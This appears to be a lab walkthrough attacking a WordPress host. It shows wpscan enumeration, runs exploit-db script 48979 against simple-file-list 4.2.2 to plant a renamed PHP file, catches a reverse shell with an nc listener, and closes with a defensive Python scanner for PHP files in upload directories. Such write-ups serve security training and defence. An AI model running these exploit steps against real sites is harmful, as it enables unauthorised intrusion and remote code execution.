3 :80 wordpress + exploit

$ wpscan --url http://192.168.197.105
[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.46 (Unix) PHP/7.4.10
 |  - X-Powered-By: PHP/7.4.10

[+] WordPress readme found: http://192.168.197.105/readme.html

[+] Upload directory has listing enabled: http://192.168.197.105/wp-content/uploads/

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).

[+] WordPress theme in use: news-vibrant
 | Location: http://192.168.197.105/wp-content/themes/news-vibrant/
 | Readme: http://192.168.197.105/wp-content/themes/news-vibrant/readme.txt
 | [!] The version is out of date, the latest version is 1.0.13
 | Version: 1.0.12 (80% confidence)
 
[i] Plugin(s) Identified:
[+] simple-file-list
 | Location: http://192.168.197.105/wp-content/plugins/simple-file-list/
 | [!] The version is out of date, the latest version is 4.4.7
 | Version: 4.2.2 (100% confidence)
 
[+] tutor
 | Location: http://192.168.197.105/wp-content/plugins/tutor/
 | [!] The version is out of date, the latest version is 1.9.7
 | Version: 1.5.3 (80% confidence)
 
[i] User(s) Identified:
[+] admin

# found exploits for simple-file-list v4.2.2
https://www.exploit-db.com/exploits/48449
Using https://www.exploit-db.com/exploits/48979

$ python3 48979.py http://192.168.197.105/
[ ] File 5527.png generated with password: 31f4eeea51f385510ec7328adf61ebd4
[ ] File uploaded at http://192.168.197.105//wp-content/uploads/simple-file-list/5527.png
[ ] File moved to http://192.168.197.105//wp-content/uploads/simple-file-list/5527.php
[+] Exploit seem to work.
[*] Confirmning ...

$ nc -lvnp 3306
listening on [any] 3306 ...
connect to [192.168.49.197] from (UNKNOWN) [192.168.197.105] 43822
bash: cannot set terminal process group (348): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
http
uid=33(http) gid=33(http) groups=33(http)
nukem
Linux nukem 5.8.9-arch2-1 #1 SMP PREEMPT Sun, 13 Sep 2020 23:44:55 +0000 x86_64 GNU/Linux
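
Defender-side check for the upload-then-rename pattern seen above (5527.png becoming 5527.php under wp-content/uploads/simple-file-list/). This is an added example, not part of the original notes or of the plugin; the extension list, the marker strings and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumed list of extensions a PHP-enabled web server may execute.
PHP_EXTS = {".php", ".phtml", ".php5", ".phar"}
# Byte markers that indicate PHP source regardless of the file name.
PHP_MARKERS = (b"<?php", b"<?=")


def scan_uploads(root):
    """Return sorted (relative_path, reason) findings under an uploads directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTS:
                # Nothing in an uploads tree should be executable by the server.
                findings.append((rel, "executable extension in uploads"))
                continue
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536)  # only the first 64 KiB is inspected
            except OSError:
                continue  # unreadable file: skipped, not reported
            if any(marker in head for marker in PHP_MARKERS):
                # Matches the staging step: PHP content uploaded as an image.
                findings.append((rel, "PHP code behind non-PHP extension"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: a clean image, a disguised upload, a renamed script."""
    target = os.path.join(root, "simple-file-list")
    os.makedirs(target)
    samples = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "1111.png": b"<?php /* constructed placeholder */ ?>",
        "2222.php": b"<?php /* constructed placeholder */ ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(target, name), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in scan_uploads(tmp):
            print(f"{rel}: {reason}")
```

Run it against the real wp-content/uploads path from cron or a file-integrity job; any hit in that tree warrants review, and disabling PHP execution and directory listing for the uploads directory removes the path the scan output above reported as open.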
